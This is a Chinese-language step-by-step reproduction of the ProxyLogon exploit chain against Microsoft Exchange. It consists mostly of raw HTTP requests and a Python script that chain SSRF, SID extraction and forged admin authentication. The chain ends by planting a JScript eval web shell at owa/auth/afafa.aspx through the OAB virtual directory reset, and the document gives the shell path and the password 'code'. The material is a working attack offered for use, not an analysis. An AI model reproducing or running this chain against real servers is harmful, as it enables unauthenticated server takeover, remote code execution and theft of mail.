ProxyLogon漏洞
受影响的Exchange版本:
- Exchange Server 2019 < 15.02.0792.010
- Exchange Server 2019 < 15.02.0721.013
- Exchange Server 2016 < 15.01.2106.013
- Exchange Server 2013 < 15.00.1497.012
漏洞复现
获取LegacyDN
POST /ecp/iey8.js HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=EX01.域名/autodiscover/autodiscover.xml?a=~1942062522;
Content-Type: text/xml
Content-Length: 384
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>administrator@域名</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
注意:X-FEServe的域名必须是DNSname的域名 DNSname可以在/ecp/15.0.1497.15/报错路径上面获取 具体看下面图片
获取SID
POST /ecp/1qnl.js HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=Administrator@xxx:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;
Content-Type: application/mapi-http
X-Requesttype: Connect
X-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}
X-Clientapplication: Outlook/15.0.4815.1002
X-Requestid: {E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456
Content-Length: 149
legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
送一个自己改的一个py代码来获取SID
import requests
legacyDn = 'legacyDn自己的'
mapi_body = legacyDn + \
"\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
print(mapi_body)
ct = requests.post("https://xx/ecp/iey8.js", headers={
"Cookie": "X-BEResource=Administrator@xxx:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;",
"Content-Type": "application/mapi-http",
"X-Requesttype": "Connect",
"X-Clientapplication": "Outlook/15.0.4815.1002",
"X-Requestid": "x"
},
data=mapi_body,
verify=False,
)
if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content):
print("Mapi Error!")
exit()
sid = str(ct.content).split("with SID ")[
1].split(" and MasterAccountSid")[0]
print("Got SID: " + sid)
sid = sid.replace(sid.split("-")[-1], "500")
获取cookie
POST /ecp/iey8.js HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=Administrator@xx:444/ecp/proxyLogon.ecp?a=~1942062522;
Content-Type: text/xml
msExchLogonMailbox: S-1-5-20
Content-Length: 94
<r at="NTLM" ln="Administrator"><s t="0">SID</s></r>
写shell
通过DDI组件Getlist接口获取RawIdentity(GetObject接口有时候返回NULL)
网上一些payload不靠谱
POST /ecp/iey8.js HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=Administrator@xx:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary=2jFfJZZwr0qb5stYgO1ZqrSd81o8P9sIQIZtqw5MbLZr92XtnRmMetsbZnIDjfawrqH-YrzmIzk.&a=~1942062522; ASP.NET_SessionId=a4f36e66-bb79-4a1b-958c-daa459f595c4; msExchEcpCanary=2jFfJZZwr0qb5stYgO1ZqrSd81o8P9sIQIZtqw5MbLZr92XtnRmMetsbZnIDjfawrqH-YrzmIzk.
Content-Type: application/json;
msExchLogonMailbox: S-1-5-20
Content-Length: 251
{"filter": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "", "SelectedVDirType": "OAB"}}, "sort": {}}
注意替换cookie
利用外部URL虚拟路径属性引入WebShell
POST /ecp/iey8.js HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=Administrator@xx:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=mFrh7iv_FE2eoMWsTWzwtrWfv9E-P9sIGmEtCOK69YUQ4EklZYnqp-DRHcOCxBmttLOZjsiw_Q8.&a=~1942062522; ASP.NET_SessionId=7c87c141-4e0e-4c65-b831-b58d397212d9; msExchEcpCanary=mFrh7iv_FE2eoMWsTWzwtrWfv9E-P9sIGmEtCOK69YUQ4EklZYnqp-DRHcOCxBmttLOZjsiw_Q8.
Content-Type: application/json;
msExchLogonMailbox: S-1-5-20
Content-Length: 401
{
"identity": {
"__type": "Identity:ECP",
"DisplayName": "OAB (Default Web Site)",
"RawIdentity": "cd89bed6-b5cc-4064-b915-5071b89eeafe"
},
"properties": {
"Parameters": {
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"ExternalUrl": "http://ffff/#<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"code\"],\"unsafe\");}</script> "
}
}
}
同理注意替换cookie
最后触发重置时的备份功能,将文件写入指定的UNC目录
POST /ecp/iey8.js HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=Administrator@xx:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=mFrh7iv_FE2eoMWsTWzwtrWfv9E-P9sIGmEtCOK69YUQ4EklZYnqp-DRHcOCxBmttLOZjsiw_Q8.&a=~1942062522;ASP.NET_SessionId=7c87c141-4e0e-4c65-b831-b58d397212d9; msExchEcpCanary=mFrh7iv_FE2eoMWsTWzwtrWfv9E-P9sIGmEtCOK69YUQ4EklZYnqp-DRHcOCxBmttLOZjsiw_Q8.
Content-Type: application/json;
msExchLogonMailbox: S-1-5-20
Content-Length: 378
{
"identity": {
"__type": "Identity:ECP",
"DisplayName": "OAB (Default Web Site)",
"RawIdentity": "73fff9ed-d8f5-484e-9328-5b76048abdb2"
},
"properties": {
"Parameters": {
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"FilePathName": "\\\\127.0.0.1\\c$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\afafa.aspx"
}
}
}
至此就拿下shell
Shell:路径 + owa//auth//afafa.aspx
密码:code